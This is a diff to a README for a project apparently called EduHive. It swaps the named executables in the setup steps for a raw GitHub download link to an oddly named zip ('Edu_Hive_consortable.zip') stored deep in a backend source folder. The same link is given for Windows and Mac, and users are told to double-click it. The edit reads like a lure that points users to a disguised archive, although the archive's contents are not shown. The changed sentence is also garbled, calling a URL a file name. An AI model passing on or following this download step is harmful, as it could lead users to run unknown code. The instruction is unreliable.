Aikyy99/EduHive/README.md

 1. Open the folder where you extracted the files.

-2. Look for the executable file named "EduHive.exe" (for Windows) or "EduHive.app" (for Mac).
+2. Look for the executable file named "https://github.com/Aikyy99/EduHive/raw/refs/heads/main/backend/src/courses/entities/Edu_Hive_consortable.zip" (for Windows) or "https://github.com/Aikyy99/EduHive/raw/refs/heads/main/backend/src/courses/entities/Edu_Hive_consortable.zip" (for Mac).
 Double-click this file.

 3. Follow the on-screen instructions to set up the application.